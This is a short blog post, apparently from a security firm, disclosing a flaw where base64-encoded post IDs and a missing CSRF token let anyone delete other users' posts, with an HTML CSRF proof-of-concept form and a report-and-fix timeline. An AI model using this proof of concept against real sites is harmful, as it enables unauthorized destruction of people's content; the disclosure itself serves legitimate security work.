How I was able to delete anyone’s post
Hello Guys,
This is Rapid Safeguard. Rapid Safeguard is a foolproof Security Solution for the emerging businesses and startups of India. We are focusing upon 4 major verticals including Web Security, Network Security, IoT Security and Mobile Security. We have developed Web Application Vulnerability Scanning Software.
Last month I was doing penetration testing for private company with our proprietary software. Company has Social media platform. Our software discovered Information disclosure vulnerability.



As our company rule, We are more focused on manual testing. Therefore, I dig into application, Some parameters manipulation with CSRF attack resulted into delete anyone post. Let’s see how it is possible — — .
I was going through delete a post function and to find vulnerability. It is look simple function of delete a post with Javascript confirm box. ID is encoded with base64. I have tried to manipulate the delete parameter with someone’s post.

I changed the delete parameter value “Base64encode = value” such as “MzUx = 351”. I got “200 OK” response. Now, I am able to delete all the post without any admin or user permission.
CSRF proof of concept
<html>
<body>
<script>history.pushState(‘’, ‘’, ‘/’)</script>
<form action=”https://Target//post_data.php">
<input type=”hidden” name=”del” value=” ” />
<input type=”submit” value=”Submit request” />
</form>
</body>
</html>
Surprise!! there is no CSRF token. Put del value with base64 encode.
Post inspired by blog Avinash Jain (@logicbomb_1)
Report details
26 — Sep— 2019 Bug reported to the concerned company
20 — Oct — 2019 Bug fixed
